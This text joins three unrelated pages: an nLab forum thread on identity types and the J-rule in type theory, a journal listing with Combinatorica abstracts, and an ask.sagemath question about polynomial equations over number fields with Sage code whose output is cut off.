Of course, young genius readers of the nLab who grasp the J-rule without this kind of explanation are free to skip the Idea-section and jump to the Definition-section of our entry. I think no harm is done by my attempt at an exposition – particularly since I just list a bunch of facts, no philosophy involved (apart from some ancient Latin quotes, for entertainment). • CommentRowNumber97. • CommentAuthorMike Shulman • CommentTimeSep 28th 2022 Urs, what I’m saying is that $Id_{Id_X(x,x')}(p \cdot id_x, p)$ and $Id_{\sum_{x':X} Id_X(x,x')}((x,id_x),(x',p))$ are different types. The latter is equivalent to $\sum_{q:Id_X(x,x')} Id_{Id_X(x,x')}(q\cdot id_x, p)$, so we can inhabit it if we can inhabit the first one — but the proof of that equivalence uses the J-rule. So if you’re trying to motivate the J-rule, you can’t use that equivalence. Thus, motivating the fact that $Id_{Id_X(x,x')}(p \cdot id_x, p)$ is inhabited doesn’t suffice to motivate the J-rule, because to derive the J-rule you need instead to know that $Id_{\sum_{x':X} Id_X(x,x')}((x,id_x),(x',p))$ is inhabited. • CommentRowNumber98. • CommentAuthorMike Shulman • CommentTimeSep 28th 2022 Re 90: Is equality in classical mathematics definitional equality? First-order logic does not really have a “definitional equality” in the way that type theory does. Or if it does, it’s fairly trivial. As you say, mathematics formulated in first-order logic, like ZFC, uses a propositional equality. • CommentRowNumber99. • CommentAuthorMike Shulman • CommentTimeSep 28th 2022 Re 82 There are also Swan identity types. What are the motivation behind those identity types, and how is that different from the motivation behind Martin-Löf identity types? Interesting question! I don’t know whether Swan identity types have any philosophical justification; the point as I understand it is just to get a kind of identity type in cubical type theory that satisfies a definitional computation rule for J. 
I mean, you can look at their construction and try to consider that a motivation, but you’d have to already have and understand the cubical identity types. • CommentRowNumber100. • CommentAuthorMike Shulman • CommentTimeSep 28th 2022 Re 78 Book HoTT’s identity types are by default homogeneous identity types, while both cubical type theory’s path types and H.O.T.T.’s identity types are heterogeneous identity types. There’s definitely a difference, but I wouldn’t phrase it like that. In particular, I’m not sure what “by default” means. All three theories have both homogeneous and heterogeneous identity types, and it’s not possible to have only heterogeneous ones because they have to depend on the homogeneous ones. I would say the difference is in how the heterogeneous identity types “reduce to” the homogeneous ones when the type dependence is trivial. In Book HoTT, this reduction is only up to equivalence. In HOTT, it’s a definitional equality. I’m not positive about cubical type theory, but I think there it is a definitional isomorphism.
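For a concrete side-by-side of the homogeneous/heterogeneous distinction (illustrating only the distinction itself, not the specific cubical or H.O.T.T. designs), Lean 4 ships both an `Eq` and an `HEq`:

```lean
universe u

-- homogeneous: both sides inhabit the same type
example {α : Sort u} (a : α) : a = a := rfl

-- heterogeneous: the two sides may inhabit different types
example {α : Sort u} (a : α) : HEq a a := HEq.refl a

-- when the types agree, the heterogeneous notion collapses to the
-- homogeneous one
example {α : Sort u} {a b : α} (h : HEq a b) : a = b := eq_of_heq h
```

Here `eq_of_heq` recovers the homogeneous equality from the heterogeneous one in the trivially-dependent case, the reduction whose status (up to equivalence, definitional equality, or definitional isomorphism) distinguishes the three theories above.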
http://www.journaltocs.ac.uk/index.php?action=browse&subAction=subjects&publisherID=8&journalID=2622&pageb=1&userQueryID=&sort=&local_page=&sorType=&sorCol=
for Journals by Title or ISSN for Articles by Keywords help Subjects -> MATHEMATICS (Total: 968 journals)     - APPLIED MATHEMATICS (81 journals)    - GEOMETRY AND TOPOLOGY (20 journals)    - MATHEMATICS (714 journals)    - MATHEMATICS (GENERAL) (41 journals)    - NUMERICAL ANALYSIS (22 journals)    - PROBABILITIES AND MATH STATISTICS (90 journals) MATHEMATICS (714 journals)                  1 2 3 4 | Last Showing 1 - 200 of 538 Journals sorted alphabetically Abakós       (Followers: 4) Abhandlungen aus dem Mathematischen Seminar der Universitat Hamburg       (Followers: 4) Academic Voices : A Multidisciplinary Journal       (Followers: 2) Accounting Perspectives       (Followers: 7) ACM Transactions on Algorithms (TALG)       (Followers: 15) ACM Transactions on Computational Logic (TOCL)       (Followers: 3) ACM Transactions on Mathematical Software (TOMS)       (Followers: 6) ACS Applied Materials & Interfaces       (Followers: 29) Acta Applicandae Mathematicae       (Followers: 1) Acta Mathematica       (Followers: 12) Acta Mathematica Hungarica       (Followers: 2) Acta Mathematica Scientia       (Followers: 5) Acta Mathematica Sinica, English Series       (Followers: 6) Acta Mathematica Vietnamica Acta Mathematicae Applicatae Sinica, English Series Advanced Science Letters       (Followers: 10) Advances in Applied Clifford Algebras       (Followers: 4) Advances in Calculus of Variations       (Followers: 3) Advances in Catalysis       (Followers: 5) Advances in Complex Systems       (Followers: 7) Advances in Computational Mathematics       (Followers: 19) Advances in Decision Sciences       (Followers: 3) Advances in Difference Equations       (Followers: 3) Advances in Fixed Point Theory       (Followers: 5) Advances in Geosciences (ADGEO)       (Followers: 13) Advances in Linear Algebra & Matrix Theory       (Followers: 3) Advances in Materials Science       (Followers: 14) Advances in Mathematical Physics       (Followers: 4) Advances in Mathematics       
(Followers: 11) Advances in Numerical Analysis       (Followers: 5) Advances in Operations Research       (Followers: 12) Advances in Porous Media       (Followers: 5) Advances in Pure and Applied Mathematics       (Followers: 6) Advances in Pure Mathematics       (Followers: 6) Advances in Science and Research (ASR)       (Followers: 6) Aequationes Mathematicae       (Followers: 2) African Journal of Educational Studies in Mathematics and Sciences       (Followers: 5) African Journal of Mathematics and Computer Science Research       (Followers: 4) Afrika Matematika       (Followers: 1) Air, Soil & Water Research       (Followers: 11) AKSIOMA Journal of Mathematics Education       (Followers: 1) Al-Jabar : Jurnal Pendidikan Matematika       (Followers: 1) Algebra and Logic       (Followers: 6) Algebra Colloquium       (Followers: 4) Algebra Universalis       (Followers: 2) Algorithmic Operations Research       (Followers: 5) Algorithms       (Followers: 11) Algorithms Research       (Followers: 1) American Journal of Computational and Applied Mathematics       (Followers: 5) American Journal of Mathematical Analysis American Journal of Mathematics       (Followers: 6) American Journal of Operations Research       (Followers: 5) An International Journal of Optimization and Control: Theories & Applications       (Followers: 8) Analele Universitatii Ovidius Constanta - Seria Matematica       (Followers: 1) Analysis and Applications       (Followers: 1) Analysis and Mathematical Physics       (Followers: 5) Analysis Mathematica Analysis. International mathematical journal of analysis and its applications       (Followers: 2) Annales Mathematicae Silesianae Annales mathématiques du Québec       (Followers: 4) Annales Universitatis Paedagogicae Cracoviensis. 
Studia Mathematica Annali di Matematica Pura ed Applicata       (Followers: 1) Annals of Combinatorics       (Followers: 4) Annals of Data Science       (Followers: 12) Annals of Discrete Mathematics       (Followers: 6) Annals of Mathematics       (Followers: 1) Annals of Mathematics and Artificial Intelligence       (Followers: 12) Annals of Pure and Applied Logic       (Followers: 3) Annals of the Alexandru Ioan Cuza University - Mathematics Annals of the Institute of Statistical Mathematics       (Followers: 1) Annals of West University of Timisoara - Mathematics Annuaire du Collège de France       (Followers: 5) ANZIAM Journal       (Followers: 1) Applicable Algebra in Engineering, Communication and Computing       (Followers: 2) Applications of Mathematics       (Followers: 2) Applied Categorical Structures       (Followers: 2) Applied Computational Intelligence and Soft Computing       (Followers: 11) Applied Mathematics       (Followers: 3) Applied Mathematics       (Followers: 7) Applied Mathematics & Optimization       (Followers: 6) Applied Mathematics - A Journal of Chinese Universities Applied Mathematics Letters       (Followers: 2) Applied Mathematics Research eXpress       (Followers: 1) Applied Network Science       (Followers: 3) Applied Numerical Mathematics       (Followers: 5) Applied Spatial Analysis and Policy       (Followers: 5) Arab Journal of Mathematical Sciences       (Followers: 3) Arabian Journal of Mathematics       (Followers: 2) Archive for Mathematical Logic       (Followers: 3) Archive of Applied Mechanics       (Followers: 5) Archive of Numerical Software Archives of Computational Methods in Engineering       (Followers: 5) Arkiv för Matematik       (Followers: 1) Armenian Journal of Mathematics Arnold Mathematical Journal       (Followers: 1) Artificial Satellites       (Followers: 20) Asia-Pacific Journal of Operational Research       (Followers: 3) Asian Journal of Algebra       (Followers: 1) Asian Journal of Current 
Engineering & Maths Asian-European Journal of Mathematics       (Followers: 2) Australian Mathematics Teacher, The       (Followers: 6) Australian Primary Mathematics Classroom       (Followers: 4) Australian Senior Mathematics Journal       (Followers: 1) Automatic Documentation and Mathematical Linguistics       (Followers: 5) Axioms       (Followers: 1) Baltic International Yearbook of Cognition, Logic and Communication       (Followers: 1) Basin Research       (Followers: 5) BIBECHANA       (Followers: 2) BIT Numerical Mathematics BoEM - Boletim online de Educação Matemática Boletim Cearense de Educação e História da Matemática Boletim de Educação Matemática Boletín de la Sociedad Matemática Mexicana Bollettino dell'Unione Matematica Italiana       (Followers: 1) British Journal of Mathematical and Statistical Psychology       (Followers: 20) Bruno Pini Mathematical Analysis Seminar Buletinul Academiei de Stiinte a Republicii Moldova. Matematica       (Followers: 12) Bulletin des Sciences Mathamatiques       (Followers: 4) Bulletin of Dnipropetrovsk University. 
Series : Communications in Mathematical Modeling and Differential Equations Theory       (Followers: 1) Bulletin of Mathematical Sciences       (Followers: 1) Bulletin of Symbolic Logic       (Followers: 2) Bulletin of the Australian Mathematical Society       (Followers: 1) Bulletin of the Brazilian Mathematical Society, New Series Bulletin of the London Mathematical Society       (Followers: 4) Bulletin of the Malaysian Mathematical Sciences Society Calculus of Variations and Partial Differential Equations Canadian Journal of Science, Mathematics and Technology Education       (Followers: 19) Carpathian Mathematical Publications       (Followers: 1) Catalysis in Industry       (Followers: 1) CEAS Space Journal       (Followers: 2) CHANCE       (Followers: 5) Chaos, Solitons & Fractals       (Followers: 3) ChemSusChem       (Followers: 7) Chinese Annals of Mathematics, Series B Chinese Journal of Catalysis       (Followers: 2) Chinese Journal of Mathematics Clean Air Journal       (Followers: 1) Cogent Mathematics       (Followers: 2) Cognitive Computation       (Followers: 4) Collectanea Mathematica COMBINATORICA Combinatorics, Probability and Computing       (Followers: 4) Combustion Theory and Modelling       (Followers: 14) Commentarii Mathematici Helvetici       (Followers: 1) Communications in Combinatorics and Optimization Communications in Contemporary Mathematics Communications in Mathematical Physics       (Followers: 2) Communications On Pure & Applied Mathematics       (Followers: 3) Complex Analysis and its Synergies       (Followers: 2) Complex Variables and Elliptic Equations: An International Journal Complexus Composite Materials Series       (Followers: 8) Compositio Mathematica       (Followers: 1) Comptes Rendus Mathematique       (Followers: 1) Computational and Applied Mathematics       (Followers: 2) Computational and Mathematical Methods in Medicine       (Followers: 2) Computational and Mathematical Organization Theory       (Followers: 2) 
COMBINATORICA. Hybrid journal (it can contain Open Access articles). ISSN (Print) 0209-9683, ISSN (Online) 1439-6912. Published by Springer-Verlag.

• Maximum Scattered Linear Sets and Complete Caps in Galois Spaces
  Authors: Daniele Bartoli, Massimo Giulietti, Giuseppe Marino, Olga Polverino. Pages: 255–278.
  Abstract: Explicit constructions of infinite families of scattered F_q-linear sets in PG(r−1, q^t) of maximal rank rt/2, for t ≥ 4 even, are provided. When q = 2, these linear sets correspond to complete caps in AG(r, 2^t) fixed by a translation group of size 2^{rt/2}. The doubling construction applied to such caps gives complete caps in AG(r+1, 2^t) of size 2^{rt/2+1}. For Galois spaces of even dimension greater than 2 and even square order, this solves the long-standing problem of establishing whether the theoretical lower bound for the size of a complete cap is substantially sharp.
  PubDate: 2018-04-01. DOI: 10.1007/s00493-016-3531-6. Issue No: Vol. 38, No. 2 (2018).

• Intervals of Permutation Class Growth Rates
  Authors: David Bevan. Pages: 279–303.
  Abstract: We prove that the set of growth rates of permutation classes includes an infinite sequence of intervals whose infimum is θ_B ≈ 2.35526, and that it also contains every value at least λ_B ≈ 2.35698. These results improve on a theorem of Vatter, who determined that there are permutation classes of every growth rate at least λ_A ≈ 2.48187. Thus, we also refute his conjecture that the set of growth rates below λ_A is nowhere dense. Our proof is based upon an analysis of expansions of real numbers in non-integer bases, the study of which was initiated by Rényi in the 1950s. In particular, we prove two generalisations of a result of Pedicini concerning expansions in which the digits are drawn from sets of allowed values.
  PubDate: 2018-04-01. DOI: 10.1007/s00493-016-3349-2. Issue No: Vol. 38, No. 2 (2018).

• Local Convergence of Random Graph Colorings
  Authors: Amin Coja-Oghlan, Charilaos Efthymiou, Nor Jaafari. Pages: 341–380.
  Abstract: Let G = G(n, m) be a random graph whose average degree d = 2m/n is below the k-colorability threshold. If we sample a k-coloring σ of G uniformly at random, what can we say about the correlations between the colors assigned to vertices that are far apart? According to a prediction from statistical physics, for average degrees below the so-called condensation threshold d_{k,cond}, the colors assigned to far away vertices are asymptotically independent [Krzakala et al.: Proc. National Academy of Sciences 2007]. We prove this conjecture for k exceeding a certain constant k_0. More generally, we investigate the joint distribution of the k-colorings that σ induces locally on the bounded-depth neighborhoods of any fixed number of vertices. In addition, we point out an implication on the reconstruction problem.
  PubDate: 2018-04-01. DOI: 10.1007/s00493-016-3394-x. Issue No: Vol. 38, No. 2 (2018).

• Connected Tree-Width
  Authors: Reinhard Diestel, Malte Müller. Pages: 381–398.
  Abstract: The connected tree-width of a graph is the minimum width of a tree-decomposition whose parts induce connected subgraphs. Long cycles are examples of graphs that have small tree-width but large connected tree-width. We show that a graph has small connected tree-width if and only if it has small tree-width and contains no long geodesic cycle. We further prove a connected analogue of the duality theorem for tree-width: a finite graph has small connected tree-width if and only if it has no bramble whose connected covers are all large. Both these results are qualitative: the bounds are good but not tight.
  We show that graphs of connected tree-width k are k-hyperbolic, which is tight, and that graphs of tree-width k whose geodesic cycles all have length at most ℓ are ⌊(3/2)ℓ(k−1)⌋-hyperbolic. The existence of such a function h(k, ℓ) had been conjectured by Sullivan.
  PubDate: 2018-04-01. DOI: 10.1007/s00493-016-3516-5. Issue No: Vol. 38, No. 2 (2018).

• Conway Groupoids and Completely Transitive Codes
  Authors: Nick Gill, Neil I. Gillespie, Jason Semeraro. Pages: 399–442.
  Abstract: To each supersimple 2-(n, 4, λ) design D one associates a 'Conway groupoid', which may be thought of as a natural generalisation of Conway's Mathieu groupoid M_13, which is constructed from P_3. We show that Sp_{2m}(2) and 2^{2m}.Sp_{2m}(2) naturally occur as Conway groupoids associated to certain designs. It is shown that the incidence matrix associated to one of these designs generates a new family of completely transitive F_2-linear codes with minimum distance 4 and covering radius 3, whereas the incidence matrix of the other design gives an alternative construction of a previously known family of completely transitive codes. We also give a new characterization of M_13 and prove that, for a fixed λ > 0, there are finitely many Conway groupoids for which the set of morphisms does not contain all elements of the full alternating group.
  PubDate: 2018-04-01. DOI: 10.1007/s00493-016-3433-7. Issue No: Vol. 38, No. 2 (2018).

• Point-Curve Incidences in the Complex Plane
  Authors: Adam Sheffer, Endre Szabó, Joshua Zahl. Pages: 487–499.
  Abstract: We prove an incidence theorem for points and curves in the complex plane. Given a set of m points in ℝ² and a set of n curves with k degrees of freedom, Pach and Sharir proved that the number of point-curve incidences is $$O\left( {{m^{\frac{k}{{2k - 1}}}}{n^{\frac{{2k - 2}}{{2k - 1}}}} + m + n} \right)$$.
  We establish the slightly weaker bound $${O_\varepsilon }\left( {{m^{\frac{k}{{2k - 1}} + \varepsilon }}{n^{\frac{{2k - 2}}{{2k - 1}}}} + m + n} \right)$$ on the number of incidences between m points and n (complex) algebraic curves in ℂ² with k degrees of freedom. We combine tools from algebraic geometry and differential geometry to prove a key technical lemma that controls the number of complex curves that can be contained inside a real hypersurface. This lemma may be of independent interest to other researchers proving incidence theorems over ℂ.
  PubDate: 2018-04-01. DOI: 10.1007/s00493-016-3441-7. Issue No: Vol. 38, No. 2 (2018).

• More Distinct Distances Under Local Conditions
  Authors: Jacob Fox, János Pach, Andrew Suk. Pages: 501–509.
  Abstract: We establish the following result related to Erdős's problem on distinct distances. Let V be an n-element planar point set such that any p members of V determine at least $$\left( {\begin{array}{*{20}{c}} p \\ 2 \end{array}} \right) - p + 6$$ distinct distances. Then V determines at least $$n^{\tfrac{8} {7} - o(1)}$$ distinct distances, as n tends to infinity.
  PubDate: 2018-04-01. DOI: 10.1007/s00493-016-3637-x. Issue No: Vol. 38, No. 2 (2018).

• List Supermodular Coloring with Shorter Lists
  Authors: Yu Yokoi.
  Abstract: In 1995, Galvin proved that a bipartite graph G admits a list edge coloring if every edge is assigned a color list of length Δ(G), the maximum degree of the graph. This result was improved by Borodin, Kostochka and Woodall, who proved that G still admits a list edge coloring if every edge e = st is assigned a list of max{d_G(s), d_G(t)} colors. Recently, Iwata and Yokoi provided the list supermodular coloring theorem that extends Galvin's result to the setting of Schrijver's supermodular coloring. This paper provides a common generalization of these two extensions of Galvin's result.
  PubDate: 2018-05-17. DOI: 10.1007/s00493-018-3830-1.

• Edge-Partitioning a Graph into Paths: Beyond the Barát-Thomassen Conjecture
  Authors: Julien Bensmail, Ararat Harutyunyan, Tien-Nam Le, Stéphan Thomassé.
  Abstract: In 2006, Barát and Thomassen conjectured that there is a function f such that, for every fixed tree T with t edges, every f(t)-edge-connected graph with its number of edges divisible by t has a partition of its edges into copies of T. This conjecture was recently verified by the current authors and Merker [1]. We here further focus on the path case of the Barát-Thomassen conjecture. Before the aforementioned general proof was announced, several successive steps towards the path case of the conjecture were made, notably by Thomassen [11,12,13], until this particular case was totally solved by Botler, Mota, Oshiro and Wakabayashi [2]. Our goal in this paper is to propose an alternative proof of the path case with a weaker hypothesis: namely, we prove that there is a function f such that every 24-edge-connected graph with minimum degree f(t) has an edge-partition into paths of length t whenever t divides the number of edges. We also show that 24 can be dropped to 4 when the graph is eulerian.
  PubDate: 2018-05-17. DOI: 10.1007/s00493-017-3661-5.

• Long Cycles have the Edge-Erdős-Pósa Property
  Authors: Henning Bruhn, Matthias Heinlein, Felix Joos.
  Abstract: We prove that the set of long cycles has the edge-Erdős-Pósa property: for every fixed integer ℓ ≥ 3 and every k ∈ ℕ, every graph G either contains k edge-disjoint cycles of length at least ℓ (long cycles) or an edge set X of size O(k² log k + kℓ) such that G − X does not contain any long cycle. This answers a question of Birmelé, Bondy, and Reed (Combinatorica 27 (2007), 135-145).
  PubDate: 2018-05-17. DOI: 10.1007/s00493-017-3669-x.

• A Remark on the Paper "Properties of Intersecting Families of Ordered Sets" by O. Einstein
  Authors: Sang-Il Oum, Sounggun Wee.
  Abstract: O.
Einstein (2008) proved Bollobás-type theorems on intersecting families of ordered sets of finite sets and subspaces. Unfortunately, we report that the proof of a theorem on ordered sets of subspaces had a mistake. We prove two weaker variants.
  PubDate: 2018-04-17. DOI: 10.1007/s00493-018-3812-3.

• A Note on Restricted List Edge-Colourings
  Authors: Tamás Fleiner.
  Abstract: We prove an extension of Galvin's theorem, namely that any graph is L-edge-choosable if |L(e)| ≥ χ′(G) for every edge e and the edge-lists of no odd cycle contain a common colour.
  PubDate: 2018-04-17. DOI: 10.1007/s00493-018-3888-9.

• The Sub-Exponential Transition for the Chromatic Generalized Ramsey Numbers
  Authors: Choongbum Lee, Brandon Tran.
  Abstract: A simple graph-product type construction shows that for all natural numbers r ≥ q, there exists an edge-coloring of the complete graph on 2^r vertices using r colors where the graph consisting of the union of any q color classes has chromatic number 2^q. We show that for each fixed natural number q, if there exists an edge-coloring of the complete graph on n vertices using r colors where the graph consisting of the union of any q color classes has chromatic number at most 2^q − 1, then n must be sub-exponential in r. This answers a question of Conlon, Fox, Lee, and Sudakov.
  PubDate: 2018-04-17. DOI: 10.1007/s00493-017-3474-6.

• Local Algorithms, Regular Graphs of Large Girth, and Random Regular Graphs
  Authors: Carlos Hoppen, Nicholas Wormald.
  Abstract: We introduce a general class of algorithms and analyse their application to regular graphs of large girth. In particular, we can transfer several results proved for random regular graphs into (deterministic) results about all regular graphs with sufficiently large girth. This reverses the usual direction, which is from the deterministic setting to the random one.
  In particular, this approach enables, for the first time, the achievement of results equivalent to those obtained on random regular graphs by a powerful class of algorithms which contain prioritised actions. As a result, we obtain new upper or lower bounds on the size of maximum independent sets, minimum dominating sets, maximum k-independent sets, minimum k-dominating sets and maximum k-separated matchings in r-regular graphs with large girth.
  PubDate: 2018-04-17. DOI: 10.1007/s00493-016-3236-x.

• The Probability of Generating the Symmetric Group
  Authors: Sean Eberhard, Stefan-Christoph Virchow.
  Abstract: We consider the probability p(S_n) that a pair of random permutations generates either the alternating group A_n or the symmetric group S_n. Dixon (1969) proved that p(S_n) approaches 1 as n → ∞ and conjectured that p(S_n) = 1 − 1/n + o(1/n). This conjecture was verified by Babai (1989), using the Classification of Finite Simple Groups. We give an elementary proof of this result; specifically we show that p(S_n) = 1 − 1/n + O(n^{−2+ε}). Our proof is based on character theory and character estimates, including recent work by Schlage-Puchta (2012).
  PubDate: 2018-03-27. DOI: 10.1007/s00493-017-3629-5.

• Infinite Graphic Matroids
  Authors: Nathan Bowler, Johannes Carmesin, Robin Christian.
  Abstract: We introduce a class of infinite graphic matroids that contains all the motivating examples and satisfies an extension of Tutte's excluded minors characterisation of finite graphic matroids. We prove that its members can be represented by certain 'graph-like' topological spaces previously considered by Thomassen and Vella.
  PubDate: 2018-03-27. DOI: 10.1007/s00493-016-3178-3.

• Castelnuovo-Mumford Regularity of Graphs
  Authors: Türker Bıyıkoğlu, Yusuf Civan.
  Abstract: We present new combinatorial results on the calculation of (Castelnuovo-Mumford) regularity of graphs.
  We introduce the notion of a prime graph over a field k, which we define to be a connected graph with reg_k(G − x) < reg_k(G) for any vertex x ∈ V(G). We then exhibit some structural properties of prime graphs. This enables us to provide upper bounds on the regularity involving the induced matching number im(G). We prove that reg(G) ≤ (Γ(G) + 1) im(G) holds for any graph G, where Γ(G) = max{|N_G[x] \ N_G[y]| : xy ∈ E(G)} is the maximum privacy degree of G and N_G[x] is the closed neighbourhood of x in G. In the case of claw-free graphs, we verify that this bound can be strengthened by showing that reg(G) ≤ 2 im(G). By analysing the effect of Lozin transformations on graphs, we narrow the search for prime graphs to graphs having maximum degree at most three. We show that the regularity of such graphs G is bounded above by 2 im(G) + 1. Moreover, we prove that any non-trivial Lozin operation preserves the primeness of a graph. That enables us to generate many new prime graphs from the existing ones. We prove that the inequality reg(G/e) ≤ reg(G) ≤ reg(G/e) + 1 holds for the contraction of any edge e of a graph G. This implies that reg(H) ≤ reg(G) whenever H is an edge contraction minor of G. Finally, we show that there exist connected graphs satisfying reg(G) = n and im(G) = k for any two integers n ≥ k ≥ 1. The proof is based on a result of Januszkiewicz and Świątkowski on the existence of Gromov hyperbolic right-angled Coxeter groups of arbitrarily large virtual cohomological dimension, accompanied with Lozin operations. In an opposite direction, we show that if G is a 2K_2-free prime graph, then reg(G) ≤ (δ(G) + 3)/2, where δ(G) is the minimum degree of G.
  PubDate: 2018-03-27. DOI: 10.1007/s00493-017-3450-1.

• Simultaneous Linear Discrepancy for Unions of Intervals
  Authors: Ron Holzman, Nitzan Tur.
  Abstract: Lovász proved (see [7]) that given real numbers p_1, ..., p_n, one can round them up or down to integers ϵ_1, ..., ϵ_n, in such a way that the total rounding error over every interval (i.e., sum of consecutive p_i's) is at most 1 − 1/(n+1). Here we show that the rounding can be done so that for all $$d = 1,...,\left\lfloor {\frac{{n + 1}}{2}} \right\rfloor$$, the total rounding error over every union of d intervals is at most (1 − d/(n+1))d. This answers a question of Bohman and Holzman [1], who showed that such rounding is possible for each value of d separately.
  PubDate: 2018-03-05. DOI: 10.1007/s00493-017-3769-7.

• Long Cycles in Locally Expanding Graphs, with Applications
  Authors: Michael Krivelevich.
  Abstract: We provide sufficient conditions for the existence of long cycles in locally expanding graphs, and present applications of our conditions and techniques to Ramsey theory, random graphs and positional games.
  PubDate: 2018-03-05. DOI: 10.1007/s00493-017-3701-1.

• Associahedra Via Spines
  Authors: Carsten Lange, Vincent Pilaud.
  Abstract: An associahedron is a polytope whose vertices correspond to triangulations of a convex polygon and whose edges correspond to flips between them. Using labeled polygons, C. Hohlweg and C. Lange constructed various realizations of the associahedron with relevant properties related to the symmetric group and the permutahedron. We introduce the spine of a triangulation as its dual tree together with a labeling and an orientation. This notion extends the classical understanding of the associahedron via binary trees, introduces a new perspective on C. Hohlweg and C. Lange's construction closer to J.-L. Loday's original approach, and sheds light upon the combinatorial and geometric properties of the resulting realizations of the associahedron.
  It also leads to noteworthy proofs which shorten and simplify previous approaches.
  PubDate: 2018-02-07. DOI: 10.1007/s00493-015-3248-y.
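The Holzman–Tur abstract above quotes Lovász's interval rounding lemma. A classical way to see that a bound of this general shape holds is prefix-sum rounding. The sketch below is my own plain-Python illustration, not code from either paper, and it only demonstrates the easy bound: every interval's total rounding error is at most 1, weaker than the sharp 1 − 1/(n+1).

```python
import random

# Prefix-sum rounding: round the running sums to the nearest integer and
# take differences. The error over any interval [i, j) telescopes to a
# difference of two prefix rounding errors, each at most 1/2, so it is <= 1.
def prefix_round(p):
    eps, prev = [], 0
    total = 0.0
    for pi in p:
        total += pi
        q = round(total)          # nearest integer to the prefix sum
        eps.append(q - prev)      # integer step assigned to this entry
        prev = q
    return eps

random.seed(1)
p = [random.random() for _ in range(40)]
eps = prefix_round(p)
worst = max(abs(sum(p[i:j]) - sum(eps[i:j]))
            for i in range(len(p)) for j in range(i + 1, len(p) + 1))
```

Checking `worst` confirms that no interval's rounding error exceeds 1 for this sample; achieving 1 − 1/(n+1), let alone the simultaneous union-of-intervals bound of the paper, needs the more careful arguments in the references.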
https://ask.sagemath.org/question/50044/solving-system-of-equations-over-number-field/
# solving system of equations over number field

I am trying to solve two 2-variable polynomial equations over $F:=\mathbb{Q}(i)$ modulo $K:=F(\sqrt{2})$. Specifically, let p1 = $a^2+6b^2$, p2 = $3a^2+2b^2$, and $K^{\ast4}:=\langle k^4\mid k\in K\setminus 0 \rangle$, i.e. the group of 4th powers of nonzero elements of $K$. I want to find (all?) $a$ and $b$ in $F$ such that p1 $\equiv 1$ modulo $K^{\ast4}$ and p2 $\equiv -1$ modulo $K^{\ast4}$. Any amount of walk-through or pointing in the right direction, or telling me this might not be doable, would be great! I am relatively new to Sage, or at least it has been years since I've used it.

The best I can do is reduce it to a system of 8 equations in $12$ variables over $\mathbb{Q}$. Write $a=x+yi$ and $b=z+wi$. We want $a^2+6b^2$ to be a fourth power, say $(a_1 + a_2i + a_3\sqrt{2} + a_4\sqrt{2}i)^4$. Similarly we want $-(3a^2 + 2b^2) = (b_1 + b_2i + b_3\sqrt{2} + b_4\sqrt{2}i)^4$. We can get the $\mathbb{Q}$-coefficients of these equations by making a polynomial ring over $K$ in the variables $x,y,z,w,a_1,a_2,a_3,a_4,b_1,b_2,b_3,b_4$, then using the vector space structure of $K$ and changing the ring of the vectors to a polynomial ring in the same variables over $\mathbb{Q}$.
    x = polygen(QQ)
    F.<i> = NumberField(x^2 + 1)
    K.<t> = F.extension(x^2 - 2)
    R.<x,y,z,w,a1,a2,a3,a4,b1,b2,b3,b4> = PolynomialRing(K, 2+2+2*4)
    a = x + y*i
    b = z + w*i
    eq1 = a^2 + 6*b^2 - (a1 + a2*i + a3*t + a4*i*t)^4
    eq2 = -(3*a^2 + 2*b^2) - (b1 + b2*i + b3*t + b4*i*t)^4
    V, from_V, to_V = K.absolute_vector_space()
    S = PolynomialRing(QQ, names=R.gens())
    R_to_4S = lambda u: list(sum(to_V(c).change_ring(S)*S(m) for (c,m) in zip(u.coefficients(), u.monomials())))
    I = S.ideal(R_to_4S(eq1) + R_to_4S(eq2))
    I.gens()

Output:

    [-a1^4 + 6*a1^2*a2^2 - a2^4 - 6*a1^2*a2*a3 + 2*a2^3*a3 - 12*a1^2*a3^2 + 12*a2^2*a3^2 - 4*a2*a3^3 - 4*a3^4 - 2*a1^3*a4 + 6*a1*a2^2*a4 + 48*a1*a2*a3*a4 - 12*a1*a3^2*a4 + 12*a1^2*a4^2 - 12*a2^2*a4^2 + 12*a2*a3*a4^2 + 24*a3^2*a4^2 + 4*a1*a4^3 - 4*a4^4 + x^2 - y^2 + 6*z^2 - 6*w^2,
     2/3*a1^3*a2 - 2/3*a1*a2^3 - 10/3*a1^3*a3 + 10*a1*a2^2*a3 + 4*a1*a2*a3^2 - 20/3*a1*a3^3 + 10*a1^2*a2*a4 - 10/3*a2^3*a4 + 4*a1^2*a3*a4 - 4*a2^2*a3*a4 + 20*a2*a3^2*a4 + 8/3*a3^3*a4 - 4*a1*a2*a4^2 + 20*a1*a3*a4^2 - 20/3*a2*a4^3 - 8/3*a3*a4^3 - 1/3*x*y - 2*z*w,
     6*a1^2*a2*a3 - 2*a2^3*a3 + 4*a2*a3^3 + 2*a1^3*a4 - 6*a1*a2^2*a4 + 12*a1*a3^2*a4 - 12*a2*a3*a4^2 - 4*a1*a4^3,
     2/3*a1^3*a2 - 2/3*a1*a2^3 + 2/3*a1^3*a3 - 2*a1*a2^2*a3 + 4*a1*a2*a3^2 + 4/3*a1*a3^3 - 2*a1^2*a2*a4 + 2/3*a2^3*a4 + 4*a1^2*a3*a4 - 4*a2^2*a3*a4 - 4*a2*a3^2*a4 + 8/3*a3^3*a4 - 4*a1*a2*a4^2 - 4*a1*a3*a4^2 + 4/3*a2*a4^3 - 8/3*a3*a4^3 - 1/3*x*y - 2*z*w,
     -b1^4 + 6*b1^2*b2^2 - b2^4 - 6*b1^2*b2*b3 + 2*b2^3*b3 - 12*b1^2*b3^2 + 12*b2^2*b3^2 - 4*b2*b3^3 - 4*b3^4 - 2*b1^3*b4 + 6*b1*b2^2*b4 + 48*b1*b2*b3*b4 - 12*b1*b3^2*b4 + 12*b1^2*b4^2 - 12*b2^2*b4^2 + 12*b2*b3*b4^2 + 24*b3^2*b4^2 + 4*b1*b4^3 - 4*b4^4 - 3*x^2 + 3*y^2 - 2*z^2 + 2*w^2,
     2/3*b1^3*b2 - 2/3*b1*b2^3 - 10/3*b1^3*b3 + 10*b1*b2^2*b3 + 4*b1*b2*b3^2 - 20/3*b1*b3^3 + 10*b1^2*b2*b4 - 10/3*b2^3*b4 + 4*b1^2*b3*b4 - 4*b2^2*b3*b4 + 20*b2*b3^2*b4 + 8/3*b3^3*b4 - 4*b1*b2*b4^2 + 20*b1*b3*b4^2 - 20/3*b2*b4^3 - 8/3*b3*b4^3 + x*y + 2/3*z*w,
     6*b1^2*b2*b3 - 2*b2^3*b3 + 4*b2*b3^3 + 2*b1^3*b4 -
